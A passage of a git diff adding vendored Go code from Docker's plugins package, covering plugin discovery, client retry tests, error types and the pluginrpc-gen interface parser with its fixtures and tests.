time.Duration(16)}, + {6, time.Duration(30)}, + {10, time.Duration(30)}, + } + + for _, c := range cases { + s := c.expTimeOff * time.Second + if d := backoff(c.retries); d != s { + t.Fatalf("Retry %v, expected %v, was %v\n", c.retries, s, d) + } + } +} + +func TestAbortRetry(t *testing.T) { + cases := []struct { + timeOff time.Duration + expAbort bool + }{ + {time.Duration(1), false}, + {time.Duration(2), false}, + {time.Duration(10), false}, + {time.Duration(30), true}, + {time.Duration(40), true}, + } + + for _, c := range cases { + s := c.timeOff * time.Second + if a := abort(time.Now(), s); a != c.expAbort { + t.Fatalf("Duration %v, expected %v, was %v\n", c.timeOff, s, a) + } + } +} + +func TestClientScheme(t *testing.T) { + cases := map[string]string{ + "tcp://127.0.0.1:8080": "http", + "unix:///usr/local/plugins/foo": "http", + "http://127.0.0.1:8080": "http", + "https://127.0.0.1:8080": "https", + } + + for addr, scheme := range cases { + u, err := url.Parse(addr) + if err != nil { + t.Fatal(err) + } + s := httpScheme(u) + + if s != scheme { + t.Fatalf("URL scheme mismatch, expected %s, got %s", scheme, s) + } + } +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery.go b/vendor/github.com/docker/docker/pkg/plugins/discovery.go new file mode 100644 index 0000000000..e99581c573 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery.go @@ -0,0 +1,131 @@ +package plugins + +import ( + "encoding/json" + "errors" + "fmt" + "io/ioutil" + "net/url" + "os" + "path/filepath" + "strings" + "sync" +) + +var ( + // ErrNotFound plugin not found + ErrNotFound = errors.New("plugin not found") + socketsPath = "/run/docker/plugins" +) + +// localRegistry defines a registry that is local (using unix socket). +type localRegistry struct{} + +func newLocalRegistry() localRegistry { + return localRegistry{} +} + +// Scan scans all the plugin paths and returns all the names it found +func Scan() ([]string, error) { + var names []string + if err := filepath.Walk(socketsPath, func(path string, fi os.FileInfo, err error) error { + if err != nil { + return nil + } + + if fi.Mode()&os.ModeSocket != 0 { + name := strings.TrimSuffix(fi.Name(), filepath.Ext(fi.Name())) + names = append(names, name) + } + return nil + }); err != nil { + return nil, err + } + + for _, path := range specsPaths { + if err := filepath.Walk(path, func(p string, fi os.FileInfo, err error) error { + if err != nil || fi.IsDir() { + return nil + } + name := strings.TrimSuffix(fi.Name(), filepath.Ext(fi.Name())) + names = append(names, name) + return nil + }); err != nil { + return nil, err + } + } + return names, nil +} + +// Plugin returns the plugin registered with the given name (or returns an error). +func (l *localRegistry) Plugin(name string) (*Plugin, error) { + socketpaths := pluginPaths(socketsPath, name, ".sock") + + for _, p := range socketpaths { + if fi, err := os.Stat(p); err == nil && fi.Mode()&os.ModeSocket != 0 { + return NewLocalPlugin(name, "unix://"+p), nil + } + } + + var txtspecpaths []string + for _, p := range specsPaths { + txtspecpaths = append(txtspecpaths, pluginPaths(p, name, ".spec")...) + txtspecpaths = append(txtspecpaths, pluginPaths(p, name, ".json")...) + } + + for _, p := range txtspecpaths { + if _, err := os.Stat(p); err == nil { + if strings.HasSuffix(p, ".json") { + return readPluginJSONInfo(name, p) + } + return readPluginInfo(name, p) + } + } + return nil, ErrNotFound +} + +func readPluginInfo(name, path string) (*Plugin, error) { + content, err := ioutil.ReadFile(path) + if err != nil { + return nil, err + } + addr := strings.TrimSpace(string(content)) + + u, err := url.Parse(addr) + if err != nil { + return nil, err + } + + if len(u.Scheme) == 0 { + return nil, fmt.Errorf("Unknown protocol") + } + + return NewLocalPlugin(name, addr), nil +} + +func readPluginJSONInfo(name, path string) (*Plugin, error) { + f, err := os.Open(path) + if err != nil { + return nil, err + } + defer f.Close() + + var p Plugin + if err := json.NewDecoder(f).Decode(&p); err != nil { + return nil, err + } + p.name = name + if p.TLSConfig != nil && len(p.TLSConfig.CAFile) == 0 { + p.TLSConfig.InsecureSkipVerify = true + } + p.activateWait = sync.NewCond(&sync.Mutex{}) + + return &p, nil +} + +func pluginPaths(base, name, ext string) []string { + return []string{ + filepath.Join(base, name+ext), + filepath.Join(base, name, name+ext), + } +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go new file mode 100644 index 0000000000..03f9d00319 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go @@ -0,0 +1,152 @@ +package plugins + +import ( + "io/ioutil" + "os" + "path/filepath" + "testing" +) + +func Setup(t *testing.T) (string, func()) { + tmpdir, err := ioutil.TempDir("", "docker-test") + if err != nil { + t.Fatal(err) + } + backup := socketsPath + socketsPath = tmpdir + specsPaths = []string{tmpdir} + + return tmpdir, func() { + socketsPath = backup + os.RemoveAll(tmpdir) + } +} + +func TestFileSpecPlugin(t *testing.T) { + tmpdir, unregister := Setup(t) + defer unregister() + + cases := []struct { + path string + name string + addr string + fail bool + }{ + // TODO Windows: Factor out the unix:// variants. + {filepath.Join(tmpdir, "echo.spec"), "echo", "unix://var/lib/docker/plugins/echo.sock", false}, + {filepath.Join(tmpdir, "echo", "echo.spec"), "echo", "unix://var/lib/docker/plugins/echo.sock", false}, + {filepath.Join(tmpdir, "foo.spec"), "foo", "tcp://localhost:8080", false}, + {filepath.Join(tmpdir, "foo", "foo.spec"), "foo", "tcp://localhost:8080", false}, + {filepath.Join(tmpdir, "bar.spec"), "bar", "localhost:8080", true}, // unknown transport + } + + for _, c := range cases { + if err := os.MkdirAll(filepath.Dir(c.path), 0755); err != nil { + t.Fatal(err) + } + if err := ioutil.WriteFile(c.path, []byte(c.addr), 0644); err != nil { + t.Fatal(err) + } + + r := newLocalRegistry() + p, err := r.Plugin(c.name) + if c.fail && err == nil { + continue + } + + if err != nil { + t.Fatal(err) + } + + if p.name != c.name { + t.Fatalf("Expected plugin `%s`, got %s\n", c.name, p.name) + } + + if p.Addr != c.addr { + t.Fatalf("Expected plugin addr `%s`, got %s\n", c.addr, p.Addr) + } + + if p.TLSConfig.InsecureSkipVerify != true { + t.Fatalf("Expected TLS verification to be skipped") + } + } +} + +func TestFileJSONSpecPlugin(t *testing.T) { + tmpdir, unregister := Setup(t) + defer unregister() + + p := filepath.Join(tmpdir, "example.json") + spec := `{ + "Name": "plugin-example", + "Addr": "https://example.com/docker/plugin", + "TLSConfig": { + "CAFile": "/usr/shared/docker/certs/example-ca.pem", + "CertFile": "/usr/shared/docker/certs/example-cert.pem", + "KeyFile": "/usr/shared/docker/certs/example-key.pem" + } +}` + + if err := ioutil.WriteFile(p, []byte(spec), 0644); err != nil { + t.Fatal(err) + } + + r := newLocalRegistry() + plugin, err := r.Plugin("example") + if err != nil { + t.Fatal(err) + } + + if expected, actual := "example", plugin.name; expected != actual { + t.Fatalf("Expected plugin %q, got %s\n", expected, actual) + } + + if plugin.Addr != "https://example.com/docker/plugin" { + t.Fatalf("Expected plugin addr `https://example.com/docker/plugin`, got %s\n", plugin.Addr) + } + + if plugin.TLSConfig.CAFile != "/usr/shared/docker/certs/example-ca.pem" { + t.Fatalf("Expected plugin CA `/usr/shared/docker/certs/example-ca.pem`, got %s\n", plugin.TLSConfig.CAFile) + } + + if plugin.TLSConfig.CertFile != "/usr/shared/docker/certs/example-cert.pem" { + t.Fatalf("Expected plugin Certificate `/usr/shared/docker/certs/example-cert.pem`, got %s\n", plugin.TLSConfig.CertFile) + } + + if plugin.TLSConfig.KeyFile != "/usr/shared/docker/certs/example-key.pem" { + t.Fatalf("Expected plugin Key `/usr/shared/docker/certs/example-key.pem`, got %s\n", plugin.TLSConfig.KeyFile) + } +} + +func TestFileJSONSpecPluginWithoutTLSConfig(t *testing.T) { + tmpdir, unregister := Setup(t) + defer unregister() + + p := filepath.Join(tmpdir, "example.json") + spec := `{ + "Name": "plugin-example", + "Addr": "https://example.com/docker/plugin" +}` + + if err := ioutil.WriteFile(p, []byte(spec), 0644); err != nil { + t.Fatal(err) + } + + r := newLocalRegistry() + plugin, err := r.Plugin("example") + if err != nil { + t.Fatal(err) + } + + if expected, actual := "example", plugin.name; expected != actual { + t.Fatalf("Expected plugin %q, got %s\n", expected, actual) + } + + if plugin.Addr != "https://example.com/docker/plugin" { + t.Fatalf("Expected plugin addr `https://example.com/docker/plugin`, got %s\n", plugin.Addr) + } + + if plugin.TLSConfig != nil { + t.Fatalf("Expected plugin TLSConfig nil, got %v\n", plugin.TLSConfig) + } +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go new file mode 100644 index 0000000000..693a47e394 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go @@ -0,0 +1,5 @@ +// +build !windows + +package plugins + +var specsPaths = []string{"/etc/docker/plugins", "/usr/lib/docker/plugins"} diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go new file mode 100644 index 0000000000..3e2d506b97 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go @@ -0,0 +1,61 @@ +// +build !windows + +package plugins + +import ( + "fmt" + "net" + "os" + "path/filepath" + "reflect" + "testing" +) + +func TestLocalSocket(t *testing.T) { + // TODO Windows: Enable a similar version for Windows named pipes + tmpdir, unregister := Setup(t) + defer unregister() + + cases := []string{ + filepath.Join(tmpdir, "echo.sock"), + filepath.Join(tmpdir, "echo", "echo.sock"), + } + + for _, c := range cases { + if err := os.MkdirAll(filepath.Dir(c), 0755); err != nil { + t.Fatal(err) + } + + l, err := net.Listen("unix", c) + if err != nil { + t.Fatal(err) + } + + r := newLocalRegistry() + p, err := r.Plugin("echo") + if err != nil { + t.Fatal(err) + } + + pp, err := r.Plugin("echo") + if err != nil { + t.Fatal(err) + } + if !reflect.DeepEqual(p, pp) { + t.Fatalf("Expected %v, was %v\n", p, pp) + } + + if p.name != "echo" { + t.Fatalf("Expected plugin `echo`, got %s\n", p.name) + } + + addr := fmt.Sprintf("unix://%s", c) + if p.Addr != addr { + t.Fatalf("Expected plugin addr `%s`, got %s\n", addr, p.Addr) + } + if p.TLSConfig.InsecureSkipVerify != true { + t.Fatalf("Expected TLS verification to be skipped") + } + l.Close() + } +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go new file mode 100644 index 0000000000..d7c1fe4942 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go @@ -0,0 +1,8 @@ +package plugins + +import ( + "os" + "path/filepath" +) + +var specsPaths = []string{filepath.Join(os.Getenv("programdata"), "docker", "plugins")} diff --git a/vendor/github.com/docker/docker/pkg/plugins/errors.go b/vendor/github.com/docker/docker/pkg/plugins/errors.go new file mode 100644 index 0000000000..7988471026 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/errors.go @@ -0,0 +1,33 @@ +package plugins + +import ( + "fmt" + "net/http" +) + +type statusError struct { + status int + method string + err string +} + +// Error returns a formatted string for this error type +func (e *statusError) Error() string { + return fmt.Sprintf("%s: %v", e.method, e.err) +} + +// IsNotFound indicates if the passed in error is from an http.StatusNotFound from the plugin +func IsNotFound(err error) bool { + return isStatusError(err, http.StatusNotFound) +} + +func isStatusError(err error, status int) bool { + if err == nil { + return false + } + e, ok := err.(*statusError) + if !ok { + return false + } + return e.status == status +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go b/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go new file mode 100644 index 0000000000..b19c0d52f1 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go @@ -0,0 +1,44 @@ +package plugins + +import ( + "errors" + "path/filepath" + "runtime" + "sync" + "testing" + "time" +) + +// regression test for deadlock in handlers +func TestPluginAddHandler(t *testing.T) { + // make a plugin which is pre-activated + p := &Plugin{activateWait: sync.NewCond(&sync.Mutex{})} + p.Manifest = &Manifest{Implements: []string{"bananas"}} + storage.plugins["qwerty"] = p + + testActive(t, p) + Handle("bananas", func(_ string, _ *Client) {}) + testActive(t, p) +} + +func TestPluginWaitBadPlugin(t *testing.T) { + p := &Plugin{activateWait: sync.NewCond(&sync.Mutex{})} + p.activateErr = errors.New("some junk happened") + testActive(t, p) +} + +func testActive(t *testing.T, p *Plugin) { + done := make(chan struct{}) + go func() { + p.waitActive() + close(done) + }() + + select { + case <-time.After(100 * time.Millisecond): + _, f, l, _ := runtime.Caller(1) + t.Fatalf("%s:%d: deadlock in waitActive", filepath.Base(f), l) + case <-done: + } + +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md new file mode 100644 index 0000000000..0418a3e00a --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md @@ -0,0 +1,58 @@ +Plugin RPC Generator +==================== + +Generates go code from a Go interface definition for proxying between the plugin +API and the subsystem being extended. + +## Usage + +Given an interface definition: + +```go +type volumeDriver interface { + Create(name string, opts opts) (err error) + Remove(name string) (err error) + Path(name string) (mountpoint string, err error) + Mount(name string) (mountpoint string, err error) + Unmount(name string) (err error) +} +``` + +**Note**: All function options and return values must be named in the definition. + +Run the generator: + +```bash +$ pluginrpc-gen --type volumeDriver --name VolumeDriver -i volumes/drivers/extpoint.go -o volumes/drivers/proxy.go +``` + +Where: +- `--type` is the name of the interface to use +- `--name` is the subsystem that the plugin "Implements" +- `-i` is the input file containing the interface definition +- `-o` is the output file where the the generated code should go + +**Note**: The generated code will use the same package name as the one defined in the input file + +Optionally, you can skip functions on the interface that should not be +implemented in the generated proxy code by passing in the function name to `--skip`. +This flag can be specified multiple times. + +You can also add build tags that should be prepended to the generated code by +supplying `--tag`. This flag can be specified multiple times. + +## Known issues + +## go-generate + +You can also use this with go-generate, which is pretty awesome. +To do so, place the code at the top of the file which contains the interface +definition (i.e., the input file): + +```go +//go:generate pluginrpc-gen -i $GOFILE -o proxy.go -type volumeDriver -name VolumeDriver +``` + +Then cd to the package dir and run `go generate` + +**Note**: the `pluginrpc-gen` binary must be within your `$PATH` diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go new file mode 100644 index 0000000000..5695dcc2d4 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go @@ -0,0 +1,89 @@ +package foo + +import ( + "fmt" + + aliasedio "io" + + "github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture" +) + +var ( + errFakeImport = fmt.Errorf("just to import fmt for imports tests") +) + +type wobble struct { + Some string + Val string + Inception *wobble +} + +// Fooer is an empty interface used for tests. +type Fooer interface{} + +// Fooer2 is an interface used for tests. +type Fooer2 interface { + Foo() +} + +// Fooer3 is an interface used for tests. +type Fooer3 interface { + Foo() + Bar(a string) + Baz(a string) (err error) + Qux(a, b string) (val string, err error) + Wobble() (w *wobble) + Wiggle() (w wobble) + WiggleWobble(a []*wobble, b []wobble, c map[string]*wobble, d map[*wobble]wobble, e map[string][]wobble, f []*otherfixture.Spaceship) (g map[*wobble]wobble, h [][]*wobble, i otherfixture.Spaceship, j *otherfixture.Spaceship, k map[*otherfixture.Spaceship]otherfixture.Spaceship, l []otherfixture.Spaceship) +} + +// Fooer4 is an interface used for tests. +type Fooer4 interface { + Foo() error +} + +// Bar is an interface used for tests. +type Bar interface { + Boo(a string, b string) (s string, err error) +} + +// Fooer5 is an interface used for tests. +type Fooer5 interface { + Foo() + Bar +} + +// Fooer6 is an interface used for tests. +type Fooer6 interface { + Foo(a otherfixture.Spaceship) +} + +// Fooer7 is an interface used for tests. +type Fooer7 interface { + Foo(a *otherfixture.Spaceship) +} + +// Fooer8 is an interface used for tests. +type Fooer8 interface { + Foo(a map[string]otherfixture.Spaceship) +} + +// Fooer9 is an interface used for tests. +type Fooer9 interface { + Foo(a map[string]*otherfixture.Spaceship) +} + +// Fooer10 is an interface used for tests. +type Fooer10 interface { + Foo(a []otherfixture.Spaceship) +} + +// Fooer11 is an interface used for tests. +type Fooer11 interface { + Foo(a []*otherfixture.Spaceship) +} + +// Fooer12 is an interface used for tests. +type Fooer12 interface { + Foo(a aliasedio.Reader) +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go new file mode 100644 index 0000000000..1937d1786c --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go @@ -0,0 +1,4 @@ +package otherfixture + +// Spaceship is a fixture for tests +type Spaceship struct{} diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/main.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/main.go new file mode 100644 index 0000000000..e77a7d45ff --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/main.go @@ -0,0 +1,91 @@ +package main + +import ( + "bytes" + "flag" + "fmt" + "go/format" + "io/ioutil" + "os" + "unicode" + "unicode/utf8" +) + +type stringSet struct { + values map[string]struct{} +} + +func (s stringSet) String() string { + return "" +} + +func (s stringSet) Set(value string) error { + s.values[value] = struct{}{} + return nil +} +func (s stringSet) GetValues() map[string]struct{} { + return s.values +} + +var ( + typeName = flag.String("type", "", "interface type to generate plugin rpc proxy for") + rpcName = flag.String("name", *typeName, "RPC name, set if different from type") + inputFile = flag.String("i", "", "input file path") + outputFile = flag.String("o", *inputFile+"_proxy.go", "output file path") + + skipFuncs map[string]struct{} + flSkipFuncs = stringSet{make(map[string]struct{})} + + flBuildTags = stringSet{make(map[string]struct{})} +) + +func errorOut(msg string, err error) { + if err == nil { + return + } + fmt.Fprintf(os.Stderr, "%s: %v\n", msg, err) + os.Exit(1) +} + +func checkFlags() error { + if *outputFile == "" { + return fmt.Errorf("missing required flag `-o`") + } + if *inputFile == "" { + return fmt.Errorf("missing required flag `-i`") + } + return nil +} + +func main() { + flag.Var(flSkipFuncs, "skip", "skip parsing for function") + flag.Var(flBuildTags, "tag", "build tags to add to generated files") + flag.Parse() + skipFuncs = flSkipFuncs.GetValues() + + errorOut("error", checkFlags()) + + pkg, err := Parse(*inputFile, *typeName) + errorOut(fmt.Sprintf("error parsing requested type %s", *typeName), err) + + var analysis = struct { + InterfaceType string + RPCName string + BuildTags map[string]struct{} + *ParsedPkg + }{toLower(*typeName), *rpcName, flBuildTags.GetValues(), pkg} + var buf bytes.Buffer + + errorOut("parser error", generatedTempl.Execute(&buf, analysis)) + src, err := format.Source(buf.Bytes()) + errorOut("error formatting generated source:\n"+buf.String(), err) + errorOut("error writing file", ioutil.WriteFile(*outputFile, src, 0644)) +} + +func toLower(s string) string { + if s == "" { + return "" + } + r, n := utf8.DecodeRuneInString(s) + return string(unicode.ToLower(r)) + s[n:] +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser.go new file mode 100644 index 0000000000..6c547e18cf --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser.go @@ -0,0 +1,263 @@ +package main + +import ( + "errors" + "fmt" + "go/ast" + "go/parser" + "go/token" + "path" + "reflect" + "strings" +) + +var errBadReturn = errors.New("found return arg with no name: all args must be named") + +type errUnexpectedType struct { + expected string + actual interface{} +} + +func (e errUnexpectedType) Error() string { + return fmt.Sprintf("got wrong type expecting %s, got: %v", e.expected, reflect.TypeOf(e.actual)) +} + +// ParsedPkg holds information about a package that has been parsed, +// its name and the list of functions. +type ParsedPkg struct { + Name string + Functions []function + Imports []importSpec +} + +type function struct { + Name string + Args []arg + Returns []arg + Doc string +} + +type arg struct { + Name string + ArgType string + PackageSelector string +} + +func (a *arg) String() string { + return a.Name + " " + a.ArgType +} + +type importSpec struct { + Name string + Path string +} + +func (s *importSpec) String() string { + var ss string + if len(s.Name) != 0 { + ss += s.Name + } + ss += s.Path + return ss +} + +// Parse parses the given file for an interface definition with the given name. +func Parse(filePath string, objName string) (*ParsedPkg, error) { + fs := token.NewFileSet() + pkg, err := parser.ParseFile(fs, filePath, nil, parser.AllErrors) + if err != nil { + return nil, err + } + p := &ParsedPkg{} + p.Name = pkg.Name.Name + obj, exists := pkg.Scope.Objects[objName] + if !exists { + return nil, fmt.Errorf("could not find object %s in %s", objName, filePath) + } + if obj.Kind != ast.Typ { + return nil, fmt.Errorf("exected type, got %s", obj.Kind) + } + spec, ok := obj.Decl.(*ast.TypeSpec) + if !ok { + return nil, errUnexpectedType{"*ast.TypeSpec", obj.Decl} + } + iface, ok := spec.Type.(*ast.InterfaceType) + if !ok { + return nil, errUnexpectedType{"*ast.InterfaceType", spec.Type} + } + + p.Functions, err = parseInterface(iface) + if err != nil { + return nil, err + } + + // figure out what imports will be needed + imports := make(map[string]importSpec) + for _, f := range p.Functions { + args := append(f.Args, f.Returns...) + for _, arg := range args { + if len(arg.PackageSelector) == 0 { + continue + } + + for _, i := range pkg.Imports { + if i.Name != nil { + if i.Name.Name != arg.PackageSelector { + continue + } + imports[i.Path.Value] = importSpec{Name: arg.PackageSelector, Path: i.Path.Value} + break + } + + _, name := path.Split(i.Path.Value) + splitName := strings.Split(name, "-") + if len(splitName) > 1 { + name = splitName[len(splitName)-1] + } + // import paths have quotes already added in, so need to remove them for name comparison + name = strings.TrimPrefix(name, `"`) + name = strings.TrimSuffix(name, `"`) + if name == arg.PackageSelector { + imports[i.Path.Value] = importSpec{Path: i.Path.Value} + break + } + } + } + } + + for _, spec := range imports { + p.Imports = append(p.Imports, spec) + } + + return p, nil +} + +func parseInterface(iface *ast.InterfaceType) ([]function, error) { + var functions []function + for _, field := range iface.Methods.List { + switch f := field.Type.(type) { + case *ast.FuncType: + method, err := parseFunc(field) + if err != nil { + return nil, err + } + if method == nil { + continue + } + functions = append(functions, *method) + case *ast.Ident: + spec, ok := f.Obj.Decl.(*ast.TypeSpec) + if !ok { + return nil, errUnexpectedType{"*ast.TypeSpec", f.Obj.Decl} + } + iface, ok := spec.Type.(*ast.InterfaceType) + if !ok { + return nil, errUnexpectedType{"*ast.TypeSpec", spec.Type} + } + funcs, err := parseInterface(iface) + if err != nil { + fmt.Println(err) + continue + } + functions = append(functions, funcs...) + default: + return nil, errUnexpectedType{"*astFuncType or *ast.Ident", f} + } + } + return functions, nil +} + +func parseFunc(field *ast.Field) (*function, error) { + f := field.Type.(*ast.FuncType) + method := &function{Name: field.Names[0].Name} + if _, exists := skipFuncs[method.Name]; exists { + fmt.Println("skipping:", method.Name) + return nil, nil + } + if f.Params != nil { + args, err := parseArgs(f.Params.List) + if err != nil { + return nil, err + } + method.Args = args + } + if f.Results != nil { + returns, err := parseArgs(f.Results.List) + if err != nil { + return nil, fmt.Errorf("error parsing function returns for %q: %v", method.Name, err) + } + method.Returns = returns + } + return method, nil +} + +func parseArgs(fields []*ast.Field) ([]arg, error) { + var args []arg + for _, f := range fields { + if len(f.Names) == 0 { + return nil, errBadReturn + } + for _, name := range f.Names { + p, err := parseExpr(f.Type) + if err != nil { + return nil, err + } + args = append(args, arg{name.Name, p.value, p.pkg}) + } + } + return args, nil +} + +type parsedExpr struct { + value string + pkg string +} + +func parseExpr(e ast.Expr) (parsedExpr, error) { + var parsed parsedExpr + switch i := e.(type) { + case *ast.Ident: + parsed.value += i.Name + case *ast.StarExpr: + p, err := parseExpr(i.X) + if err != nil { + return parsed, err + } + parsed.value += "*" + parsed.value += p.value + parsed.pkg = p.pkg + case *ast.SelectorExpr: + p, err := parseExpr(i.X) + if err != nil { + return parsed, err + } + parsed.pkg = p.value + parsed.value += p.value + "." + parsed.value += i.Sel.Name + case *ast.MapType: + parsed.value += "map[" + p, err := parseExpr(i.Key) + if err != nil { + return parsed, err + } + parsed.value += p.value + parsed.value += "]" + p, err = parseExpr(i.Value) + if err != nil { + return parsed, err + } + parsed.value += p.value + parsed.pkg = p.pkg + case *ast.ArrayType: + parsed.value += "[]" + p, err := parseExpr(i.Elt) + if err != nil { + return parsed, err + } + parsed.value += p.value + parsed.pkg = p.pkg + default: + return parsed, errUnexpectedType{"*ast.Ident or *ast.StarExpr", i} + } + return parsed, nil +} diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go new file mode 100644 index 0000000000..a1b1ac9567 --- /dev/null +++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go @@ -0,0 +1,222 @@ +package main + +import ( + "fmt" + "path/filepath" + "runtime" + "strings" + "testing" +) + +const testFixture = "fixtures/foo.go" + +func TestParseEmptyInterface(t *testing.T) { + pkg, err := Parse(testFixture, "Fooer") + if err != nil { + t.Fatal(err) + } + + assertName(t, "foo", pkg.Name) + assertNum(t, 0, len(pkg.Functions)) +} + +func TestParseNonInterfaceType(t *testing.T) { + _, err := Parse(testFixture, "wobble") + if _, ok := err.(errUnexpectedType); !ok { + t.Fatal("expected type error when parsing non-interface type") + } +} + +func TestParseWithOneFunction(t *testing.T) { + pkg, err := Parse(testFixture, "Fooer2") + if err != nil { + t.Fatal(err) + } + + assertName(t, "foo", pkg.Name) + assertNum(t, 1, len(pkg.Functions)) + assertName(t, "Foo", pkg.Functions[0].Name) + assertNum(t, 0, len(pkg.Functions[0].Args)) + assertNum(t, 0, len(pkg.Functions[0].Returns)) +} + +func TestParseWithMultipleFuncs(t *testing.T) { + pkg, err := Parse(testFixture, "Fooer3") + if err != nil { + t.Fatal(err) + } + + assertName(t, "foo", pkg.Name) + assertNum(t, 7, len(pkg.Functions)) + + f := pkg.Functions[0] + assertName(t, "Foo", f.Name) + assertNum(t, 0, len(f.Args)) + assertNum(t, 0, len(f.Returns)) + + f = pkg.Functions[1] + assertName(t, "Bar", f.Name) + assertNum(t, 1, len(f.Args)) + assertNum(t, 0, len(f.Returns)) + arg := f.Args[0] + assertName(t, "a", arg.Name) + assertName(t, "string", arg.ArgType) + + f = pkg.Functions[2] + assertName(t, "Baz", f.Name) + assertNum(t, 1, len(f.Args)) + assertNum(t, 1, len(f.Returns)) + arg = f.Args[0] + assertName(t, "a", arg.Name) + assertName(t, "string", arg.ArgType) + arg = f.Returns[0] + assertName(t, "err", arg.Name) + assertName(t, "error", arg.ArgType) + + f = pkg.Functions[3] + assertName(t, "Qux", f.Name) + assertNum(t, 2, len(f.Args)) + assertNum(t, 2, len(f.Returns)) + arg = f.Args[0] + assertName(t, "a", f.Args[0].Name) + assertName(t, "string", f.Args[0].ArgType) + arg = f.Args[1] + assertName(t, "b", arg.Name) + assertName(t, "string", arg.ArgType) + arg = f.Returns[0] + assertName(t, "val", arg.Name) + assertName(t, "string", arg.ArgType) + arg = f.Returns[1] + assertName(t, "err", arg.Name) + assertName(t, "error", arg.ArgType) + + f = pkg.Functions[4] + assertName(t, "Wobble", f.Name) + assertNum(t, 0, len(f.Args)) + assertNum(t, 1, len(f.Returns)) + arg = f.Returns[0] + assertName(t, "w", arg.Name) + assertName(t, "*wobble", arg.ArgType) + + f = pkg.Functions[5] + assertName(t, "Wiggle", f.Name) + assertNum(t, 0, len(f.Args)) + assertNum(t, 1, len(f.Returns)) + arg = f.Returns[0] + assertName(t, "w", arg.Name) + assertName(t, "wobble", arg.ArgType) + + f = pkg.Functions[6] + assertName(t, "WiggleWobble", f.Name) + assertNum(t, 6, len(f.Args)) + assertNum(t, 6, len(f.Returns)) + expectedArgs := [][]string{ + {"a", "[]*wobble"}, + {"b", "[]wobble"}, + {"c", "map[string]*wobble"}, + {"d", "map[*wobble]wobble"}, + {"e", "map[string][]wobble"}, + {"f", "[]*otherfixture.Spaceship"}, + } + for i, arg := range f.Args { + assertName(t, expectedArgs[i][0], arg.Name) + assertName(t, expectedArgs[i][1], arg.ArgType) + } + expectedReturns := [][]string{ + {"g", "map[*wobble]wobble"}, + {"h", "[][]*wobble"}, + {"i", "otherfixture.Spaceship"}, + {"j", "*otherfixture.Spaceship"}, + {"k", "map[*otherfixture.Spaceship]otherfixture.Spaceship"}, + {"l", "[]otherfixture.Spaceship"}, + } + for i, ret := range f.Returns { + assertName(t, expectedReturns[i][0], ret.Name) + assertName(t, expectedReturns[i][1], ret.ArgType) + } +} + +func TestParseWithUnamedReturn(t *testing.T) { + _, err := Parse(testFixture, "Fooer4") + if !strings.HasSuffix(err.Error(), errBadReturn.Error()) { + t.Fatalf("expected ErrBadReturn, got %v", err) + } +} + +func TestEmbeddedInterface(t *testing.T) { + pkg, err := Parse(testFixture, "Fooer5") + if err != nil { + t.Fatal(err) + } + + assertName(t, "foo", pkg.Name) + assertNum(t, 2, len(pkg.Functions)) + + f := pkg.Functions[0] + assertName(t, "Foo", f.Name) + assertNum(t, 0, len(f.Args)) + assertNum(t, 0, len(f.Returns)) + + f = pkg.Functions[1] + assertName(t, "Boo", f.Name) + assertNum(t, 2, len(f.Args)) + assertNum(t, 2, len(f.Returns)) + + arg := f.Args[0] + assertName(t, "a", arg.Name) + assertName(t, "string", arg.ArgType) + + arg = f.Args[1] + assertName(t, "b", arg.Name) + assertName(t, "string", arg.ArgType) + + arg = f.Returns[0] + assertName(t, "s", arg.Name) + assertName(t, "string", arg.ArgType) + + arg = f.Returns[1] + assertName(t, "err", arg.Name) + assertName(t, "error", arg.ArgType) +} + +func TestParsedImports(t *testing.T) { + cases := []string{"Fooer6", "Fooer7", "Fooer8", "Fooer9", "Fooer10", "Fooer11"} + for _, testCase := range cases { + pkg, err := Parse(testFixture, testCase) + if err != nil { + t.Fatal(err) + } + + 